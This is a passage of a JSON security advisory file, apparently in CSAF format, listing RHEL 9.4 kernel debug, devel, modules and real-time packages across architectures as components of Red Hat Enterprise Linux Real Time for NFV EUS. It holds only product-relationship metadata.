"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
